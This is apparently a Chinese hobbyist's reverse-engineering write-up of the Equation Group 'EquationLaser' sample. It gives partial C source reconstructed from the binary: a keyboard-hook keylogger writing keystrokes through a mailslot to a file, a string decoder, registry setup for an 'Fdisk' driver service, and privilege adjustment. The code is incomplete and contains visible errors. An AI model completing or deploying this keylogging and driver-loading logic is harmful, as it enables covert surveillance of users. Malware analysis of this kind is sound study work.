EquationLaser是方程式样本中的较早,从它的编程应用技巧的"古老"程度可以看出来,当然对于我这种编程经验比较欠缺的爱好者还是值得学习研究一下的.它会收集一些系统信息,键盘记录等。本来在资源里有个驱动文件,但是样本里的驱动已经释放出去,数据全为零,所以主要的功能应该还没分析到。
(仅供参考)
#include"stdafx.h"
#include<stdio.h>
#include<aclapi.h>
#include<process.h>
#include<winsock2.h>
#include<winuser.h>
#include<winnt.h>
#include<windows.h>
WORD MaxUdpDg=0;//word_100509c0
DWORD dword_69f84,dword_69f88,dword_1f74c,dword_1f750,dword_1f754,dword_6a010;
LONG Addend=0;
bool IsDeviceOpen=false,IsExitWinNeeded;
HANDLE hDevice=INVALID_HANDLE_VALUE,hHandle=INVALID_HANDLE_VALUE,hThread=INVALID_HANDLE_VALUE,hmod=INVALID_HANDLE_VALUE;
OSVERSIONINFOA Size;
HHOOK hhk[3];
char mailslot_name[0x30]="\\\\.\\mailslot\\__MS_1509_";
char Name[4076];
typedef bool(WINAPI *_OpenProcessToken)(HANDLE ProcessHandle,DWORD DesiredAccess,PHANDLE TokenHandle);
typedef bool(WINAPI *_LookupPrivilegeValue)(LPCTSTR lpSystemBame,LPCTSTR lpName,PLUID lpLuid);
typedef bool(WINAPI *_AdjustTokenPrivileges)(HANDLE TokenHandle,BOOL DisableAllPrivileges,PTOKEN_PRIVILEGES NewState,
DWORD BufferLength,PTOKEN_PRIVILEGES PreviousState,PDWORD ReturnLength);
typedef DWORD(WINAPI *_SetSecurityInfo)(HANDLE handle,SE_OBJECT_TYPE ObjectType,SECURITY_INFORMATION SecurityInfo,
PSID psidOwner,PSID psidGroup,PACL pDacl,PACL pSacl);
int version_info();
int OpenServiceManager();
void compute_seed(int *a,int *b,int *c);
void ShutdownPrivilege();
unsigned int _stdcall NewThread(LPVOID para);
LRESULT fn(int code,WPARAM wParam,LPARAM lParam);
BOOL APIENTRY DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH://1
{
if(version_info()==0)
{
if(Addend==0)
{
hThread=(HANDLE)_beginthreadex(0,0x100000,&NewThread,0,0,0);
if(hThread!=NULL)
{
IsExitWinNeeded=false;
}
else
{
return true;
}
}
hmod=hinstDLL;
InterlockedIncrement(&Addend);
}
break;
}
/*
case DLL_THREAD_ATTACH://2
{
break;
}
case DLL_THREAD_DETACH://3
{
break;
}
*/
case DLL_PROCESS_DETACH://0
{
//
if(version_info()==0)
{
InterlockedDecrement(&Addend);
if(Addend==0)
{
//sub_1000f7fb
}
if(IsDeviceOpen!=false)
{
if(hDevice!=INVALID_HANDLE_VALUE)
{
CloseHandle(hDevice);
}
else
{
hDevice=NULL;
IsDeviceOpen=false;
}
}
ReleaseSemaphore(hHandle,7,0);
Sleep(0xbb8);
if(IsExitWinNeeded==false)
{
ShutdownPrivilege();
ExitWindows(6,0);
}
}
break;
}
}
return TRUE;
}
int version()
{
DWORD dwVersion=0;
DWORD dwMajorVersion=0;
DWORD dwMiniorVersion=0;
DWORD dwBuild=0;
dwVersion=GetVersion();
// printf("dwVersion:%8x\n",dwVersion);
//get windows version
dwMajorVersion=(DWORD)(LOBYTE(LOWORD(dwVersion)));
dwMiniorVersion=(DWORD)(HIBYTE(LOWORD(dwVersion)));
dwBuild=(DWORD)(HIWORD(dwVersion));
//printf("Version is %d.%d (%d)\n",dwMajorVersion,dwMiniorVersion,dwBuild);
if(dwVersion<0x80000000)
{
if(dwMajorVersion==3)
{
if(dwMiniorVersion>=0x32)
{
return 0;
}
else
{
return 1;
}
}
else
{
return 0;
}
}
else
{
if(dwMajorVersion>=4)
{
return 0;
}
else
{
return 1;
}
}
}
unsigned int _stdcall NewThread(LPVOID para)
{
//
SetThreadPriority(GetCurrentThread(),0);
SetErrorMode(0x8003);
Size.dwOSVersionInfoSize=0x94;
if(GetVersionExA(&Size)==1)
{
if(Size.dwOSVersionInfoSize==2)
{
dword_1f74c=1;
if(Size.dwMajorVersion==5)
{
dword_1f750=1;
}
}
else
{
if((Size.dwMajorVersion==4)&&(Size.dwMinorVersion==0x5a))
{
dword_1f754=1;
dword_1f74c=1;
}
else
{
dword_1f754=0;
}
}
}
if(dword_1f74c==1)
{
if(OpenServiceManager()!=0)
{
return 0;
}
}
/*
*/
return 0;
}
int OpenServiceManager()
{
SC_HANDLE sc_handle=INVALID_HANDLE_VALUE;
sc_handle=OpenSCManagerA(0,0,0xf003f);
if(sc_handle==INVALID_HANDLE_VALUE)
{
Sleep(0xea60);
OpenServiceManager();
}
CloseServiceHandle(sc_handle);
return 0;
}
void decode(char *string,int length)
{
int num_to_shift=3,a=0x9ea6,b=0x4f53,c=0x7,temp=0,i=0;
while(length)
{
compute_seed(&a,&b,&c);
temp=(string[i])&7;
string[i]=(a>>num_to_shift)^(string[i]);
num_to_shift=temp;
length--;
i++;
}
}
void compute_seed(int *a,int *b,int *c)
{
int temp=0,v=0;
v=temp=(8*(*a))|((*a)>>13);
*a^=*b;
*b=(*c)^(temp&(0xfff8));
*c=v&7;
}
int GetRegkeyReady()
{
char *Class;
int finished=0;
DWORD dwDisposition,data;
HKEY hkResult;
if(RegCreateKeyExA(HKEY_LOCAL_MACHINE/*0x80000002*/,"System\\CurrentControlSet\\Services\\Fdisk",0,Class,0,0x0f003f,
0,&hkResult,&dwDisposition)==0)
{
data=1;
if(RegSetValueEx(hkResult,"Type",0,4,&data,4)==0)
{
data=3;
if(RegSetValueEx(hkResult,"Start",0,4,&data,4)==0)
{
data=0;
if(RegSetValueEx(hkResult,"ErrorControl",0,4,&data,4)==0)
{
finished=1;
}
}
}
RegCloseKey(hkResult);
}
return finished;
}
bool load_driver_get_handle()
{
/*
1,get load driver privilege
2,get address of NtLoadDriver(IN PUNICODE_STRING DriverServiceName)
3,load driver by call NtLoadDriver(\Registry\Machine\System\CurrentControlSet\Services\Fdisk)
*/
hDevice=CreateFileA("\\.\fdisk0",0xc0000000,0,0,3,0x80,0);
return hDevice==INVALID_HANDLE_VALUE?0:1;
}
bool device_io_control_2224d8()
{
DWORD ByteReturned=0;
if(Size.dwPlatformId==VER_PLATFORM_WIN32_NT)
{
if(hDevice!=INVALID_HANDLE_VALUE)
{
if(false==DeviceIoControl(hDevice,0x2224d8,0,0,0,0,&ByteReturned,0))
{
return false;
}
}
else
{
return false;
}
}
}
DWORD get_hardware_info(DWORD address)//get some hardware information
{
DWORD num1,num2,num3;
/*
mov dx,0cf8h
in eax,dx
mov num2,eax
mov ecx,address
mov num1,0cf8h
mov eax,ecx
and al,0fch
mov address,eax
out dx,eax
and ecx,3
add ecx,0cfch
mov address,ecx
mov dx,address
in eax,dx
mov num1,eax
mov ecx,num2
mov num2,0cf8h
and ecx,0fffffffch
mov address,ecx
mov dx,num2
mov eax,address
out dx,eax
;
mov eax,num1
*/
}
bool check_version()//VER_PLATFORM_WIN32_NT
{
OSVERSIONINFOA version_info;
version_info.dwOSVersionInfoSize=0x94;
if(dword_69f84!=0)
{
if(0!=GetVersionExA(&version_info))
{
MessageBoxA(NULL,"Failed to get Windows version",NULL,NULL);
exit(2);
}
else
{
if(VER_PLATFORM_WIN32_NT==version_info)
{
dword_69f84=1;
dword_69f88=1;
}
else
{
dword_69f88=0;
}
}
}
return dword_69f88;
}
void ShutdownPrivilege()//SeLoadDriverPrivilege
{
int ret=0;
HMODULE hObject;
HANDLE handle;
LUID l_luid={0};
TOKEN_PRIVILEGES l_token_privilege={0};
_OpenProcessToken l_OpenProcessToken;
_LookupPrivilegeValue l_LookupPrivilegeValue;
_AdjustTokenPrivileges l_AdjustTokenPrivileges;
hObject=LoadLibrary("ADVAPI32.DLL");
if(hObject!=NULL)
{
l_OpenProcessToken=(_OpenProcessToken)GetProcAddress(hObject,"OpenProcessToken");
if(l_OpenProcessToken!=0)
{
l_LookupPrivilegeValue=(_LookupPrivilegeValue)GetProcAddress(hObject,"LookupPrivilegeValue");
if(l_LookupPrivilegeValue!=0)
{
l_AdjustTokenPrivileges=(_AdjustTokenPrivileges)GetProcAddress(hObject,"AdjustTokenPrivileges");
if(l_AdjustTokenPrivileges!=0)
{
if(l_OpenProcessToken(GetCurrentProcess(),0x28,&handle)==true)
{
if(l_LookupPrivilegeValue(0,"SeShutdownDriverPrivilege",&l_luid)==true)
{
l_token_privilege.Privileges->Luid.HighPart=l_luid.HighPart;
l_token_privilege.Privileges->Luid.LowPart=l_luid.LowPart;
l_token_privilege.Privileges->Attributes=SE_PRIVILEGE_ENABLED;
l_token_privilege.PrivilegeCount=1;
l_AdjustTokenPrivileges(handle,false,&l_token_privilege,0x10,0,0);
//if(GetLastError()==0)
//{
// if(handle!=NULL)
// CloseHandle(handle);
// FreeLibrary(hObject);
//}
}
}
}
}
}
}
if(handle!=NULL)
CloseHandle(handle);
if(hObject!=NULL)
FreeLibrary(hObject);
}
int _WSAStartup(WORD wVersionRequested,char socket_num)
{
WSAData wsaData;
if(0!=WSAStartup(wVersionRequested,&wsaData))
{
return 1;
}
if(LOBYTE(wsaData.wVersion)<LOBYTE(wVersionRequested)||HIBYTE(wsaData.wVersion)<HIBYTE(wVersionRequested))
{
return 1;
}
else if(LOBYTE(wsaData.wVersion)!=LOBYTE(wVersionRequested)||(LOBYTE(wsaData.wVersion)==LOBYTE(wVersionRequested)&&HIBYTE(wsaData.wVersion)>=HIBYTE(wVersionRequested)))
{
if(wsaData.iMaxSockets<socket_num)
{
return 1;
}
MaxUdpDg=wsaData.iMaxUdpDg;
return 0;
}
}
int windows_hook(char *lpszDesktop,int hhook_num,int set_or_unset)
{
int ret=0;
HWINSTA hWinSta=NULL;
HWINSTA hWinSta0=NULL;
HDESK hDesktop=NULL;
do
{
hWinSta=GetProcessWindowStation();
if(hWinSta==NULL)
{
ret=0;
break;
}
hDesktop=GetThreadDesktop(GetCurrentThreadId());
if(hDesktop==NULL)
{
ret=0;
break;
}
hWinSta0=OpenWindowStationA("winsta0",false,WINSTA_ALL_ACCESS);
if(hWinSta0==NULL)
{
ret=0;
break;
}
if(false==SetProcessWindowStation(hWinSta0))
{
ret=0;
break;
}
lpszDesktop=OpenDesktopA(lpszDesktop,0,false,MAXIMUM_ALLOWED);
if(lpszDesktop==NULL)
{
ret=0;
break;
}
if(false==SetThreadDesktop(lpszDesktop))
{
ret=0;
break;
}
if(set_or_unset==0)
{
unset_hook();
}
else
{
if(0==set_hook(hhook_num))
{
ret=0;
break;
}
}
if(0==SetProcessWindowStation(hWinSta)||0==SetThreadDesktop(hDesktop)||CloseWindowStation(hWinSta0))
{
ret=CloseDesktop(lpszDesktop)?1:0;
}
}while(0);
return ret;
}
int set_hook(int hhook_num)//record key stroke
{
HHOOK hook=NULL;
Sleep(0);
hook=SetWindowsHookExA(WH_KEYBOARD,(HOOKPROC)fn,hmod,0);
InterlockedExchange(hhk+hhook_num,hook);
return hhk[hhook_num]?1:0;
}
void unset_hook(int hhook_num)
{
if(hhk[hhook_num]!=NULL)
{
Sleep(0);
UnhookWindowsHookEx(hhk[hhook_num]);
hhk[hhook_num]=NULL;
}
}
LRESULT fn(int code,WPARAM wParam,LPARAM lParam)
{
return record(hhk,code,wParam,lParam);
}
int record(HHOOK hhk,int code,WPARAM wParam,LPARAM lParam)
{
HANDLE file=INVALID_HANDLE_VALUE;
DWORD NumberOfBytesWritten=0;
WORD buffer[3]={0};
LONG result=0;
result=CallnextHookEx(hhk,code,wParam,lParam);
if(code==0)
{
if(dword_6a010!=0)
{
buffer[0]=GetCurrentProcessId();
buffer[1]=wParam;
buffer[2]=lParam; //0X40000000 1 3
file=CreateFile(Name,GENERIC_WRITE,FILE_SHARE_DELETE,null,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(INVALID_HANDLE_VALUE==file)
{
dword_6a010=0;
}
if(true==WriteFile(file,buffer,8,&NumberOfBytesWritten,NULL))
{
CloseHandle(file);
dword_6a010=1;
}
}
}
return result;
}
DWORD WINAPI do_read_mailslot(LPARAM lParam)
{
char buffer[0x50];
DWORD bytes_num=0,nNumberOfBytesToWrite;
HANDLE hObject=INVALID_HANDLE_VALUE;
HANDLE hMailslot=INVALID_HANDLE_VALUE;//4
HMODULE hModule=INVALID_HANDLE_VALUE;
_SetSecurityInfo l_SetSecurityInfo=NULL;
hObject=CreateFile((char *)lParam+0x2c0,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,NULL,NULL);
if(INVALID_HANDLE_VALUE!=hObject)
{
bytes_num=SetFilePointer(hObject,0,NULL,FILE_END);
if(bytes_num>*(DWORD *)((PVOID)lParam+0x2bc))
{
CloseHandle(hObject);
Clean_hook_and_key(lParam);
_endthreadex(1);
return 0;
}
lstrcpynA(Name,mailslot_name,0x103);
hMailslot=CreateMailslotA(Name,0,0,NULL);
if(INVALID_HANDLE_VALUE==hMailslot)
{
CloseHandle(hObject);
clean_hook_and_key(lParam);
_endthreadex(1);
}
if(0!=dword_1f74c)
{
hModule=LoadLibraryA("advapi32.dll");
if(hModule)
{
l_SetSecurityInfo=(_SetSecurityInfo)GetProcAddress(hModule,"SetSecurityInfo");
if(NULL!=l_SetSecurityInfo)
{ //6
if(ERROR_SUCCESSW==l_SetSecurityInfo(hMailslot,SE_KERNEL_OBJECT,PROCESS_SET_SESSIONID,NULL,NULL,NULL,NULL))
{
nNumberOfBytesToWrite=0;
dword_6a010=1;
do
{
nNumberOfBytesToWrite=0x50;
if(0!=read_mailslot(hMailslot,buffer,&nNumberOfBytesToWrite))
{
if(nNumberOfBytesToWrite>0)
{
if(true==WriteFile(hObject,buffer,nNumberOfBytesToWrite,NULL,NULL))
{
bytes_num+=nNumberOfBytesToWrite;
if(nNumberOfBytesToWrite>=*(DWORD *)((char *)lParam+0x2bc))
{
dword_6a010=0;
}
}
}
}
else
{
dword_6a010=0;
}
Sleep(0xfa);
}while(dword_6a010);
CloseHandle(hObject);
CloseHandle(hMailslot);
clean_hook_and_key(lParam);
return 0;
}
}
}
}
}
else
{
Clean_hook_and_key(lParam);
_endthreadex(1);
return 0;
}
}
bool check_root_drive_info(char lpRootPathName)
{
DWORD FileSystemFlags;
DWORD MaximumComponentLength;
char FileSystemNameBuffer[MAX_PATH];
if(GetVolumeInformation(lpRootPathName,NULL,0,NULL,&MaximumComponentLength,&FileSystemFlags,MAX_PATH,FileSystemNameBuffer))
{
if(0==lstrcmpA(FileSystemNameBuffer,"NTFS")&&FileSystemFlags==FILE_PERSISTENT_ACLS)
{
/*
FILE_PERSISTENT_ACLS,The specified volume preserves and enforces
access control lists(ACL).For example,the NTFS file system preserves
and enforces ACLs,and the FAT file system does not.
*/
return true;
}
}
return false;
}
int select(DWORD optlen)
{
fd_set writefds;
fd_set exceptfds;
char* optval=NULL;
timeval timeout;
writefds.fd_count=1;
writefds.fd_array=sock;
exceptfds.fd_count=1;
exceptfds.fd_array=sock;
if(optlen>0x3e8)
{
timeout.tv_usec=0;
timeout.tv_sec=optlen/0x3e8;
}
else
{
timeout.tv_usec=0;
timeout.tv_sec=0x3e8*optlen;
}
if(1=select(0,NULL,&writefds,&exceptfds,&timeout))
{
if(0==_WSAFDIsSet(sock,&exceptfds))
{
return _WSAFDIsSet(sock,&writefds)>0?1:0;
}
}
else
{
optlen=4;
return getsockopt(sock,SOL_SOCKET,SO_ERROR,(char*)&optval,&optlen)|0xff;
}
}
void clean_hook_and_key(void* lparam)
{
/*
*/
}